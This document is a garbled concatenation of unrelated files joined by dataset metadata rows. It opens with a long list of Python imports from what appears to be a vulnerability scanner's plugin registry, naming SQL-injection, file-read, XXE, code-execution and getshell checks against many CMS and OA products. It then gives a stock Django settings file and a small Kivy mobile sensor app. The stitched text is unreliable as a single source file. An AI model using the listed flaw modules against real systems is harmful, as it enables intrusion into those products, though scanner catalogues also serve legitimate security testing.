from cms.eyou.eyou_admin_id_sqli import eyou_admin_id_sqli_BaseVerify
from cms.eyou.eyou_resetpw import eyou_resetpw_BaseVerify
from cms.eyou.eyou_user_kw_sqli import eyou_user_kw_sqli_BaseVerify
#金蝶 vulns
from cms.kingdee.kingdee_filedownload import kingdee_filedownload_BaseVerify
from cms.kingdee.kingdee_resin_dir_path_disclosure import kingdee_resin_dir_path_disclosure_BaseVerify
from cms.kingdee.kingdee_conf_disclosure import kingdee_conf_disclosure_BaseVerify
from cms.kingdee.kingdee_logoImgServlet_fileread import kingdee_logoImgServlet_fileread_BaseVerify
#乐语 vulns
from cms.looyu.looyu_down_filedownload import looyu_down_filedownload_BaseVerify
#smartoa vulns
from cms.smartoa.smartoa_multi_filedownload import smartoa_multi_filedownload_BaseVerify
#URP vulns
from cms.urp.urp_query import urp_query_BaseVerify
from cms.urp.urp_query2 import urp_query2_BaseVerify
from cms.urp.urp_ReadJavaScriptServlet_fileread import urp_ReadJavaScriptServlet_fileread_BaseVerify
#PKPMBS vulns
from cms.PKPMBS.pkpmbs_guestbook_sqli import pkpmbs_guestbook_sqli_BaseVerify
from cms.PKPMBS.pkpmbs_addresslist_keyword_sqli import pkpmbs_addresslist_keyword_sqli_BaseVerify
from cms.PKPMBS.pkpmbs_MsgList_sqli import pkpmbs_MsgList_sqli_BaseVerify
#帝友 vulns
from cms.diyou.dyp2p_latesindex_sqli import dyp2p_latesindex_sqli_BaseVerify
from cms.diyou.dyp2p_url_fileread import dyp2p_url_fileread_BaseVerify
#爱琴斯 vulns
from cms.iGenus.igenus_code_exec import igenus_code_exec_BaseVerify
from cms.iGenus.igenus_login_Lang_fileread import igenus_login_Lang_fileread_BaseVerify
from cms.iGenus.igenus_syslogin_Lang_fileread import igenus_syslogin_Lang_fileread_BaseVerify
#live800 vulns
from cms.live800.live800_downlog_filedownload import live800_downlog_filedownload_BaseVerify
from cms.live800.live800_loginAction_sqli import live800_loginAction_sqli_BaseVerify
from cms.live800.live800_sta_export_sqli import live800_sta_export_sqli_BaseVerify
from cms.live800.live800_services_xxe import live800_services_xxe_BaseVerify
#thinkphp vulns
from cms.thinkphp.onethink_category_sqli import onethink_category_sqli_BaseVerify
from cms.thinkphp.thinkphp_code_exec import thinkphp_code_exec_BaseVerify
#汇思 vulns
from cms.wizbank.wizbank_download_filedownload import wizbank_download_filedownload_BaseVerify
from cms.wizbank.wizbank_usr_id_sqli import wizbank_usr_id_sqli_BaseVerify
#汇文 vulns
from cms.libsys.libsys_ajax_asyn_link_old_fileread import libsys_ajax_asyn_link_old_fileread_BaseVerify
from cms.libsys.libsys_ajax_asyn_link_fileread import libsys_ajax_asyn_link_fileread_BaseVerify
from cms.libsys.libsys_ajax_get_file_fileread import libsys_ajax_get_file_fileread_BaseVerify
#通元内容管理系统 vulns
from cms.gpower.gpower_users_disclosure import gpower_users_disclosure_BaseVerify
#metinfo cms vulns
from cms.metinfo.metinfo_getpassword_sqli import metinfo_getpassword_sqli_BaseVerify
from cms.metinfo.metinfo_login_check_sqli import metinfo_login_check_sqli_BaseVerify
#用友 vulns
from cms.yonyou.yonyou_icc_struts2 import yonyou_icc_struts2_BaseVerify
from cms.yonyou.yonyou_user_ids_sqli import yonyou_user_ids_sqli_BaseVerify
from cms.yonyou.yonyou_multi_union_sqli import yonyou_multi_union_sqli_BaseVerify
from cms.yonyou.yonyou_initData_disclosure import yonyou_initData_disclosure_BaseVerify
from cms.yonyou.yonyou_createMysql_disclosure import yonyou_createMysql_disclosure_BaseVerify
from cms.yonyou.yonyou_test_sqli import yonyou_test_sqli_BaseVerify
from cms.yonyou.yonyou_getemaildata_fileread import yonyou_getemaildata_fileread_BaseVerify
from cms.yonyou.yonyou_ehr_ELTextFile import yonyou_ehr_ELTextFile_BaseVerify
from cms.yonyou.yonyou_a8_CmxUser_sqli import yonyou_a8_CmxUser_sqli_BaseVerify
from cms.yonyou.yonyou_cm_info_content_sqli import yonyou_cm_info_content_sqli_BaseVerify
from cms.yonyou.yonyou_a8_personService_xxe import yonyou_a8_personService_xxe_BaseVerify
from cms.yonyou.yonyou_u8_CmxItem_sqli import yonyou_u8_CmxItem_sqli_BaseVerify
from cms.yonyou.yonyou_fe_treeXml_sqli import yonyou_fe_treeXml_sqli_BaseVerify
from cms.yonyou.yonyou_ehr_resetpwd_sqli import yonyou_ehr_resetpwd_sqli_BaseVerify
from cms.yonyou.yonyou_nc_NCFindWeb_fileread import yonyou_nc_NCFindWeb_fileread_BaseVerify
from cms.yonyou.yonyou_a8_logs_disclosure import yonyou_a8_logs_disclosure_BaseVerify
from cms.yonyou.yonyou_status_default_pwd import yonyou_status_default_pwd_BaseVerify
#v2tech vulns
from cms.v2tech.v2Conference_sqli_xxe import v2Conference_sqli_xxe_BaseVerify
#digital campus vulns
from cms.digital_campus.digital_campus_log_disclosure import digital_campus_log_disclosure_BaseVerify
from cms.digital_campus.digital_campus_systemcodelist_sqli import digital_campus_systemcodelist_sqli_BaseVerify
#jeecms vulns
from cms.jeecms.jeecms_fpath_filedownload import jeecms_fpath_filedownload_BaseVerify
#shopex vulns
from cms.shopex.shopex_phpinfo_disclosure import shopex_phpinfo_disclosure_BaseVerify
#FineCMS vulns
from cms.finecms.finecms_uploadfile import finecms_uploadfile_BaseVerify
#hanweb vulns
from cms.hanweb.hanweb_readxml_fileread import hanweb_readxml_fileread_BaseVerify
from cms.hanweb.hanweb_downfile_filedownload import hanweb_downfile_filedownload_BaseVerify
from cms.hanweb.hanweb_VerifyCodeServlet_install import hanweb_VerifyCodeServlet_install_BaseVerify
#php168 vulns
from cms.php168.php168_login_getshell import php168_login_getshell_BaseVerify
#dedecms vulns
from cms.dedecms.dedecms_version import dedecms_version_BaseVerify
from cms.dedecms.dedecms_recommend_sqli import dedecms_recommend_sqli_BaseVerify
from cms.dedecms.dedecms_download_redirect import dedecms_download_redirect_BaseVerify
#umail vulns
from cms.umail.umail_physical_path import umail_physical_path_BaseVerify
from cms.umail.umail_sessionid_access import umail_sessionid_access_BaseVerify
#fsmcms vulns
from cms.fsmcms.fsmcms_p_replydetail_sqli import fsmcms_p_replydetail_sqli_BaseVerify
from cms.fsmcms.fsmcms_setup_reinstall import fsmcms_setup_reinstall_BaseVerify
from cms.fsmcms.fsmcms_columninfo_sqli import fsmcms_columninfo_sqli_BaseVerify
#qibocms vulns
from cms.qibocms.qibocms_search_sqli import qibocms_search_sqli_BaseVerify
from cms.qibocms.qibocms_js_f_id_sqli import qibocms_js_f_id_sqli_BaseVerify
from cms.qibocms.qibocms_s_fids_sqli import qibocms_s_fids_sqli_BaseVerify
from cms.qibocms.qibocms_search_code_exec import qibocms_search_code_exec_BaseVerify
#inspur vulns
from cms.inspur.inspur_multi_sqli import inspur_multi_sqli_BaseVerify
from cms.inspur.inspur_ecgap_displayNewsPic_sqli import inspur_ecgap_displayNewsPic_sqli_BaseVerify
#gobetters vulns
from cms.gobetters.gobetters_multi_sqli import gobetters_multi_sqli_BaseVerify
#lbcms vulns
from cms.lbcms.lbcms_webwsfw_bssh_sqli import lbcms_webwsfw_bssh_sqli_BaseVerify
#dswjcms vulns
from cms.dswjcms.dswjcms_p2p_multi_sqli import dswjcms_p2p_multi_sqli_BaseVerify
#wordpress vulns
from cms.wordpress.wordpress_plugin_azonpop_sqli import wordpress_plugin_azonpop_sqli_BaseVerify
from cms.wordpress.wordpress_plugin_ShortCode_lfi import wordpress_plugin_ShortCode_lfi_BaseVerify
from cms.wordpress.wordpress_url_redirect import wordpress_url_redirect_BaseVerify
from cms.wordpress.wordpress_woocommerce_code_exec import wordpress_woocommerce_code_exec_BaseVerify
from cms.wordpress.wordpress_plugin_mailpress_rce import wordpress_plugin_mailpress_rce_BaseVerify
from cms.wordpress.wordpress_admin_ajax_filedownload import wordpress_admin_ajax_filedownload_BaseVerify
from cms.wordpress.wordpress_restapi_sqli import wordpress_restapi_sqli_BaseVerify
#票友 vulns
from cms.piaoyou.piaoyou_multi_sqli import piaoyou_multi_sqli_BaseVerify
from cms.piaoyou.piaoyou_ten_sqli import piaoyou_ten_sqli_BaseVerify
from cms.piaoyou.piaoyou_six_sqli import piaoyou_six_sqli_BaseVerify
from cms.piaoyou.piaoyou_six2_sqli import piaoyou_six2_sqli_BaseVerify
from cms.piaoyou.piaoyou_int_order_sqli import piaoyou_int_order_sqli_BaseVerify
from cms.piaoyou.piaoyou_newsview_list import piaoyou_newsview_list_BaseVerify
#TCExam vulns
from cms.tcexam.tcexam_reinstall_getshell import tcexam_reinstall_getshell_BaseVerify
#最土团购 vulns
from cms.zuitu.zuitu_coupon_id_sqli import zuitu_coupon_id_sqli_BaseVerify
#iwms vulns
from cms.iwms.iwms_bypass_js_delete import iwms_bypass_js_delete_BaseVerify
#cxplus vulns
from cms.xplus.xplus_2003_getshell import xplus_2003_getshell_BaseVerify
from cms.xplus.xplus_mysql_mssql_sqli import xplus_mysql_mssql_sqli_BaseVerify
#东软uniportal vulns
from cms.uniportal.uniportal_bypass_priv_sqli import uniportal_bypass_priv_sqli_BaseVerify
#pageadmin vulns
from cms.pageadmin.pageadmin_forge_viewstate import pageadmin_forge_viewstate_BaseVerify
#ruvar vulns
from cms.ruvar.ruvar_oa_multi_sqli import ruvar_oa_multi_sqli_BaseVerify
from cms.ruvar.ruvar_oa_multi_sqli2 import ruvar_oa_multi_sqli2_BaseVerify
from cms.ruvar.ruvar_oa_multi_sqli3 import ruvar_oa_multi_sqli3_BaseVerify
#jumboecms vulns
from cms.jumboecms.jumboecms_slide_id_sqli import jumboecms_slide_id_sqli_BaseVerify
#joomla vulns
from cms.joomla.joomla_com_docman_lfi import joomla_com_docman_lfi_BaseVerify
from cms.joomla.joomla_index_list_sqli import joomla_index_list_sqli_BaseVerify
#360shop vulns
from cms.shop360.shop360_do_filedownload import shop360_do_filedownload_BaseVerify
#pstar vulns
from cms.pstar.pstar_warehouse_msg_01_sqli import pstar_warehouse_msg_01_sqli_BaseVerify
from cms.pstar.pstar_isfLclInfo_sqli import pstar_isfLclInfo_sqli_BaseVerify
from cms.pstar.pstar_qcustoms_sqli import pstar_qcustoms_sqli_BaseVerify
#trs vulns
from cms.trs.trs_wcm_pre_as_lfi import trs_wcm_pre_as_lfi_BaseVerify
from cms.trs.trs_inforadar_disclosure import trs_inforadar_disclosure_BaseVerify
from cms.trs.trs_lunwen_papercon_sqli import trs_lunwen_papercon_sqli_BaseVerify
from cms.trs.trs_infogate_xxe import trs_infogate_xxe_BaseVerify
from cms.trs.trs_infogate_register import trs_infogate_register_BaseVerify
from cms.trs.trs_was5_config_disclosure import trs_was5_config_disclosure_BaseVerify
from cms.trs.trs_wcm_default_user import trs_wcm_default_user_BaseVerify
from cms.trs.trs_wcm_infoview_disclosure import trs_wcm_infoview_disclosure_BaseVerify
from cms.trs.trs_was40_passwd_disclosure import trs_was40_passwd_disclosure_BaseVerify
from cms.trs.trs_was40_tree_disclosure import trs_was40_tree_disclosure_BaseVerify
from cms.trs.trs_ids_auth_disclosure import trs_ids_auth_disclosure_BaseVerify
from cms.trs.trs_was5_download_templet import trs_was5_download_templet_BaseVerify
#易创思 vulns
from cms.ecscms.ecscms_MoreIndex_sqli import ecscms_MoreIndex_sqli_BaseVerify
#金窗教务系统 vulns
from cms.gowinsoft_jw.gowinsoft_jw_multi_sqli import gowinsoft_jw_multi_sqli_BaseVerify
#siteserver vulns
from cms.siteserver.siteserver_background_taskLog_sqli import siteserver_background_taskLog_sqli_BaseVerify
from cms.siteserver.siteserver_background_log_sqli import siteserver_background_log_sqli_BaseVerify
from cms.siteserver.siteserver_UserNameCollection_sqli import siteserver_UserNameCollection_sqli_BaseVerify
from cms.siteserver.siteserver_background_keywordsFilting_sqli import siteserver_background_keywordsFilting_sqli_BaseVerify
from cms.siteserver.siteserver_background_administrator_sqli import siteserver_background_administrator_sqli_BaseVerify
#nitc vulns
from cms.nitc.nitc_suggestwordList_sqli import nitc_suggestwordList_sqli_BaseVerify
from cms.nitc.nitc_index_language_id_sqli import nitc_index_language_id_sqli_BaseVerify
#南大之星 vulns
from cms.ndstar.ndstar_six_sqli import ndstar_six_sqli_BaseVerify
#安财软件 vulns
from cms.acsoft.acsoft_GetXMLList_fileread import acsoft_GetXMLList_fileread_BaseVerify
from cms.acsoft.acsoft_GetFile_fileread import acsoft_GetFile_fileread_BaseVerify
from cms.acsoft.acsoft_GetFileContent_fileread import acsoft_GetFileContent_fileread_BaseVerify
#英福金银花ETMV9数字化校园平台
from cms.etmdcp.etmdcp_Load_filedownload import etmdcp_Load_filedownload_BaseVerify
#speedcms vulns
from cms.speedcms.speedcms_list_cid_sqli import speedcms_list_cid_sqli_BaseVerify
#任我行 vulns
from cms.weway.weway_PictureView1_filedownload import weway_PictureView1_filedownload_BaseVerify
#esccms vulns
from cms.esccms.esccms_selectunitmember_unauth import esccms_selectunitmember_unauth_BaseVerify
#wecenter vulns
from cms.wecenter.wecenter_topic_id_sqli import wecenter_topic_id_sqli_BaseVerify
#shopnum1 vulns
from cms.shopnum.shopnum_ShoppingCart1_sqli import shopnum_ShoppingCart1_sqli_BaseVerify
from cms.shopnum.shopnum_ProductListCategory_sqli import shopnum_ProductListCategory_sqli_BaseVerify
from cms.shopnum.shopnum_GuidBuyList_sqli import shopnum_GuidBuyList_sqli_BaseVerify
from cms.shopnum.shopnum_ProductDetail_sqli import shopnum_ProductDetail_sqli_BaseVerify
#fastmeeting vulns
from cms.fastmeeting.fastmeeting_download_filedownload import fastmeeting_download_filedownload_BaseVerify
#远古 vulns
from cms.viewgood.viewgood_two_sqli import viewgood_two_sqli_BaseVerify
from cms.viewgood.viewgood_pic_proxy_sqli import viewgood_pic_proxy_sqli_BaseVerify
from cms.viewgood.viewgood_GetCaption_sqli import viewgood_GetCaption_sqli_BaseVerify
#shop7z vulns
from cms.shop7z.shop7z_order_checknoprint_sqli import shop7z_order_checknoprint_sqli_BaseVerify
#dreamgallery vulns
from cms.dreamgallery.dreamgallery_album_id_sqli import dreamgallery_album_id_sqli_BaseVerify
#kxmail vulns
from cms.kxmail.kxmail_login_server_sqli import kxmail_login_server_sqli_BaseVerify
#shopnc vulns
from cms.shopnc.shopnc_index_class_id_sqli import shopnc_index_class_id_sqli_BaseVerify
#shadowsit vulns
from cms.shadowsit.shadowsit_selector_lfi import shadowsit_selector_lfi_BaseVerify
#phpcms vulns
from cms.phpcms.phpcms_digg_add_sqli import phpcms_digg_add_sqli_BaseVerify
from cms.phpcms.phpcms_authkey_disclosure import phpcms_authkey_disclosure_BaseVerify
from cms.phpcms.phpcms_flash_upload_sqli import phpcms_flash_upload_sqli_BaseVerify
from cms.phpcms.phpcms_product_code_exec import phpcms_product_code_exec_BaseVerify
from cms.phpcms.phpcms_v96_sqli import phpcms_v96_sqli_BaseVerify
from cms.phpcms.phpcms_v961_fileread import phpcms_v961_fileread_BaseVerify
#seacms vulns
from cms.seacms.seacms_search_code_exec import seacms_search_code_exec_BaseVerify
from cms.seacms.seacms_order_code_exec import seacms_order_code_exec_BaseVerify
#cmseasy vulns
from cms.cmseasy.cmseasy_header_detail_sqli import cmseasy_header_detail_sqli_BaseVerify
#phpmyadmin vulns
from cms.phpmyadmin.phpmyadmin_setup_lfi import phpmyadmin_setup_lfi_BaseVerify
#opensns vulns
from cms.opensns.opensns_index_arearank import opensns_index_arearank_BaseVerify
from cms.opensns.opensns_index_getshell import opensns_index_getshell_BaseVerify
#thinksns vulns
from cms.thinksns.thinksns_category_code_exec import thinksns_category_code_exec_BaseVerify
#others vulns
from cms.others.domino_unauth import domino_unauth_BaseVerify
from cms.others.hjsoft_sqli import hjsoft_sqli_BaseVerify
from cms.others.hnkj_researchinfo_dan_sqli import hnkj_researchinfo_dan_sqli_BaseVerify
from cms.others.gpcsoft_ewebeditor_weak import gpcsoft_ewebeditor_weak_BaseVerify
from cms.others.rap_interface_struts_exec import rap_interface_struts_exec_BaseVerify
from cms.others.hongan_dlp_struts_exec import hongan_dlp_struts_exec_BaseVerify
from cms.others.jiuyu_library_struts_exec import jiuyu_library_struts_exec_BaseVerify
from cms.others.yaojie_steel_struts_exec import yaojie_steel_struts_exec_BaseVerify
from cms.others.dkcms_database_disclosure import dkcms_database_disclosure_BaseVerify
from cms.others.damall_selloffer_sqli import damall_selloffer_sqli_BaseVerify
from cms.others.yeu_disclosure_uid import yeu_disclosure_uid_BaseVerify
from cms.others.clib_kinweblistaction_download import clib_kinweblistaction_download_BaseVerify
from cms.others.euse_study_multi_sqli import euse_study_multi_sqli_BaseVerify
from cms.others.suntown_upfile_fileupload import suntown_upfile_fileupload_BaseVerify
from cms.others.skytech_bypass_priv import skytech_bypass_priv_BaseVerify
from cms.others.mallbuilder_change_status_sqli import mallbuilder_change_status_sqli_BaseVerify
from cms.others.efuture_downloadAct_filedownload import efuture_downloadAct_filedownload_BaseVerify
from cms.others.kj65n_monitor_sqli import kj65n_monitor_sqli_BaseVerify
from cms.others.sinda_downloadfile_download import sinda_downloadfile_download_BaseVerify
from cms.others.lianbang_multi_bypass_priv import lianbang_multi_bypass_priv_BaseVerify
from cms.others.star_PostSuggestion_sqli import star_PostSuggestion_sqli_BaseVerify
from cms.others.hezhong_list_id_sqli import hezhong_list_id_sqli_BaseVerify
from cms.others.cicro_DownLoad_filedownload import cicro_DownLoad_filedownload_BaseVerify
from cms.others.huaficms_bypass_js import huaficms_bypass_js_BaseVerify
from cms.others.nongyou_multi_sqli import nongyou_multi_sqli_BaseVerify
from cms.others.zfcgxt_UserSecurityController_getpass import zfcgxt_UserSecurityController_getpass_BaseVerify
from cms.others.mainone_b2b_Default_sqli import mainone_b2b_Default_sqli_BaseVerify
from cms.others.mainone_SupplyList_sqli import mainone_SupplyList_sqli_BaseVerify
from cms.others.workyi_multi_sqli import workyi_multi_sqli_BaseVerify
from cms.others.newedos_multi_sqli import newedos_multi_sqli_BaseVerify
from cms.others.xtcms_download_filedownload import xtcms_download_filedownload_BaseVerify
from cms.others.gn_consulting_sqli import gn_consulting_sqli_BaseVerify
from cms.others.caitong_multi_sqli import caitong_multi_sqli_BaseVerify
from cms.others.anmai_teachingtechnology_sqli import anmai_teachingtechnology_sqli_BaseVerify
from cms.others.alkawebs_viewnews_sqli import alkawebs_viewnews_sqli_BaseVerify
from cms.others.caitong_multi_sleep_sqli import caitong_multi_sleep_sqli_BaseVerify
from cms.others.clib_kindaction_fileread import clib_kindaction_fileread_BaseVerify
from cms.others.mainone_ProductList_sqli import mainone_ProductList_sqli_BaseVerify
from cms.others.eis_menu_left_edit_sqli import eis_menu_left_edit_sqli_BaseVerify
from cms.others.tianbo_Type_List_sqli import tianbo_Type_List_sqli_BaseVerify
from cms.others.tianbo_TCH_list_sqli import tianbo_TCH_list_sqli_BaseVerify
from cms.others.tianbo_Class_Info_sqli import tianbo_Class_Info_sqli_BaseVerify
from cms.others.tianbo_St_Info_sqli import tianbo_St_Info_sqli_BaseVerify
from cms.others.nongyou_Item2_sqli import nongyou_Item2_sqli_BaseVerify
from cms.others.gxwssb_fileDownloadmodel_download import gxwssb_fileDownloadmodel_download_BaseVerify
from cms.others.anmai_grghjl_stuNo_sqli import anmai_grghjl_stuNo_sqli_BaseVerify
from cms.others.nongyou_ShowLand_sqli import nongyou_ShowLand_sqli_BaseVerify
from cms.others.nongyou_sleep_sqli import nongyou_sleep_sqli_BaseVerify
from cms.others.zf_cms_FileDownload import zf_cms_FileDownload_BaseVerify
from cms.others.shiyou_list_keyWords_sqli import shiyou_list_keyWords_sqli_BaseVerify
from cms.others.zhuofan_downLoadFile_download import zhuofan_downLoadFile_download_BaseVerify
from cms.others.gevercms_downLoadFile_filedownload import gevercms_downLoadFile_filedownload_BaseVerify
from cms.others.ips_community_suite_code_exec import ips_community_suite_code_exec_BaseVerify
from cms.others.skytech_geren_list_page_sqli import skytech_geren_list_page_sqli_BaseVerify
from cms.others.xuezi_ceping_unauth import xuezi_ceping_unauth_BaseVerify
from cms.others.haohan_FileDown_filedownload import haohan_FileDown_filedownload_BaseVerify
from cms.others.mingteng_cookie_deception import mingteng_cookie_deception_BaseVerify
from cms.others.jxt1039_unauth import jxt1039_unauth_BaseVerify
| [
"[email protected]"
]
| |
650a8a893c1dcebd6bb63eb7ae18ee8468bf566d | 3c1e51cdc1e8fe95cd1dc9674954622b7ee1e71a | /backend/mobilegeee_28456/settings.py | 60372fff369e36c9a4d533d7b555077d3c91e624 | []
| no_license | crowdbotics-apps/mobilegeee-28456 | ed22c9fd3008f73442bee4af7fed0887a5ae436d | dedcfddd27f9707bfc584f602341cc32d2e79034 | refs/heads/master | 2023-06-09T02:30:41.908432 | 2021-07-05T13:52:25 | 2021-07-05T13:52:25 | 383,155,833 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 7,114 | py | """
Django settings for mobilegeee_28456 project.
Generated by 'django-admin startproject' using Django 2.2.2.
For more information on this file, see
https://docs.djangoproject.com/en/2.2/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/2.2/ref/settings/
"""
import os
import environ
import logging
env = environ.Env()
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = env.bool("DEBUG", default=False)
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/2.2/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = env.str("SECRET_KEY")
ALLOWED_HOSTS = env.list("HOST", default=["*"])
SITE_ID = 1
SECURE_PROXY_SSL_HEADER = ("HTTP_X_FORWARDED_PROTO", "https")
SECURE_SSL_REDIRECT = env.bool("SECURE_REDIRECT", default=False)
# Application definition
INSTALLED_APPS = [
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'django.contrib.sites'
]
LOCAL_APPS = [
'home',
'modules',
'users.apps.UsersConfig',
]
THIRD_PARTY_APPS = [
'rest_framework',
'rest_framework.authtoken',
'rest_auth',
'rest_auth.registration',
'bootstrap4',
'allauth',
'allauth.account',
'allauth.socialaccount',
'allauth.socialaccount.providers.google',
'django_extensions',
'drf_yasg',
'storages',
# start fcm_django push notifications
'fcm_django',
# end fcm_django push notifications
]
INSTALLED_APPS += LOCAL_APPS + THIRD_PARTY_APPS
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'mobilegeee_28456.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [os.path.join(BASE_DIR, 'web_build')],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'mobilegeee_28456.wsgi.application'
# Database
# https://docs.djangoproject.com/en/2.2/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
}
}
if env.str("DATABASE_URL", default=None):
DATABASES = {
'default': env.db()
}
# Password validation
# https://docs.djangoproject.com/en/2.2/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/2.2/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/2.2/howto/static-files/
STATIC_URL = '/static/'
MIDDLEWARE += ['whitenoise.middleware.WhiteNoiseMiddleware']
AUTHENTICATION_BACKENDS = (
'django.contrib.auth.backends.ModelBackend',
'allauth.account.auth_backends.AuthenticationBackend'
)
STATIC_ROOT = os.path.join(BASE_DIR, "staticfiles")
STATICFILES_DIRS = [os.path.join(BASE_DIR, 'static'), os.path.join(BASE_DIR, 'web_build/static')]
STATICFILES_STORAGE = 'whitenoise.storage.CompressedManifestStaticFilesStorage'
# allauth / users
ACCOUNT_EMAIL_REQUIRED = True
ACCOUNT_AUTHENTICATION_METHOD = 'email'
ACCOUNT_USERNAME_REQUIRED = False
ACCOUNT_EMAIL_VERIFICATION = "optional"
ACCOUNT_CONFIRM_EMAIL_ON_GET = True
ACCOUNT_LOGIN_ON_EMAIL_CONFIRMATION = True
ACCOUNT_UNIQUE_EMAIL = True
LOGIN_REDIRECT_URL = "users:redirect"
ACCOUNT_ADAPTER = "users.adapters.AccountAdapter"
SOCIALACCOUNT_ADAPTER = "users.adapters.SocialAccountAdapter"
ACCOUNT_ALLOW_REGISTRATION = env.bool("ACCOUNT_ALLOW_REGISTRATION", True)
SOCIALACCOUNT_ALLOW_REGISTRATION = env.bool("SOCIALACCOUNT_ALLOW_REGISTRATION", True)
REST_AUTH_SERIALIZERS = {
# Replace password reset serializer to fix 500 error
"PASSWORD_RESET_SERIALIZER": "home.api.v1.serializers.PasswordSerializer",
}
REST_AUTH_REGISTER_SERIALIZERS = {
# Use custom serializer that has no username and matches web signup
"REGISTER_SERIALIZER": "home.api.v1.serializers.SignupSerializer",
}
# Custom user model
AUTH_USER_MODEL = "users.User"
EMAIL_HOST = env.str("EMAIL_HOST", "smtp.sendgrid.net")
EMAIL_HOST_USER = env.str("SENDGRID_USERNAME", "")
EMAIL_HOST_PASSWORD = env.str("SENDGRID_PASSWORD", "")
EMAIL_PORT = 587
EMAIL_USE_TLS = True
# AWS S3 config
AWS_ACCESS_KEY_ID = env.str("AWS_ACCESS_KEY_ID", "")
AWS_SECRET_ACCESS_KEY = env.str("AWS_SECRET_ACCESS_KEY", "")
AWS_STORAGE_BUCKET_NAME = env.str("AWS_STORAGE_BUCKET_NAME", "")
AWS_STORAGE_REGION = env.str("AWS_STORAGE_REGION", "")
USE_S3 = (
AWS_ACCESS_KEY_ID and
AWS_SECRET_ACCESS_KEY and
AWS_STORAGE_BUCKET_NAME and
AWS_STORAGE_REGION
)
if USE_S3:
AWS_S3_CUSTOM_DOMAIN = env.str("AWS_S3_CUSTOM_DOMAIN", "")
AWS_S3_OBJECT_PARAMETERS = {"CacheControl": "max-age=86400"}
AWS_DEFAULT_ACL = env.str("AWS_DEFAULT_ACL", "public-read")
AWS_MEDIA_LOCATION = env.str("AWS_MEDIA_LOCATION", "media")
AWS_AUTO_CREATE_BUCKET = env.bool("AWS_AUTO_CREATE_BUCKET", True)
DEFAULT_FILE_STORAGE = env.str(
"DEFAULT_FILE_STORAGE", "home.storage_backends.MediaStorage"
)
MEDIA_URL = '/mediafiles/'
MEDIA_ROOT = os.path.join(BASE_DIR, 'mediafiles')
# start fcm_django push notifications
FCM_DJANGO_SETTINGS = {
"FCM_SERVER_KEY": env.str("FCM_SERVER_KEY", "")
}
# end fcm_django push notifications
# Swagger settings for api docs
SWAGGER_SETTINGS = {
"DEFAULT_INFO": f"{ROOT_URLCONF}.api_info",
}
if DEBUG or not (EMAIL_HOST_USER and EMAIL_HOST_PASSWORD):
# output email to console instead of sending
if not DEBUG:
logging.warning("You should setup `SENDGRID_USERNAME` and `SENDGRID_PASSWORD` env vars to send emails.")
EMAIL_BACKEND = "django.core.mail.backends.console.EmailBackend"
| [
"[email protected]"
]
| |
e924dd9290da87bcf7962e4a2e76cf2fac9d5e8a | 9e461f40bbdf63d9c00c99f398758f5b236db863 | /Python/motion_client/main.py | 017a2466ac1b43da634527a033e525fdbcd3ed5c | []
| no_license | robbynickles/portfolio | b490a98de9bc7daf6d14b074b2726a06359a8462 | 269b0593ce5e0773fa18f74c4374fcc0bccc5c40 | refs/heads/master | 2021-01-10T05:17:00.762021 | 2015-12-25T00:36:23 | 2015-12-25T00:36:23 | 48,555,399 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,567 | py | from kivy.app import App
from kivy.uix.boxlayout import BoxLayout
from kivy.core.window import Window
w, h = Window.width, Window.height
from libs.swipeplane2 import SwipePlane
from libs.device.device_view import DeviceTest
from libs.client.client_view import Client
from plyer import accelerometer, compass, gyroscope
from plyer.libs.server_utils import shutdown_server_thread
class MobileSensorTest(BoxLayout):
def __init__(self):
super(MobileSensorTest, self).__init__()
self.add_widget( DeviceTest( 'Accel', 'Accelerometer', accelerometer, accelerometer._get_acceleration ) )
self.add_widget( DeviceTest( 'Compass', 'Compass', compass, compass._get_orientation ) )
self.add_widget( DeviceTest( 'Gyro', 'Gyroscope', gyroscope, gyroscope._get_orientation ) )
def input_sources( self ):
return self.children
class MobileSensorTestApp(App):
def on_pause(self):
return True
def on_resume(self):
pass
def on_stop(self):
shutdown_server_thread()
def build(self):
swipe_plane = SwipePlane()
self.mobile_sensor_test = MobileSensorTest()
page1 = BoxLayout( pos=(0,0), size=(w, h) )
page1.add_widget( self.mobile_sensor_test )
swipe_plane.add_page( page1 )
page2 = BoxLayout( pos=(1.2*w,0), size=(w, h) )
page2.add_widget( Client( self.mobile_sensor_test.input_sources(), cols=1 ) )
swipe_plane.add_page( page2 )
return swipe_plane
if __name__ == '__main__':
MobileSensorTestApp().run()
| [
"[email protected]"
]
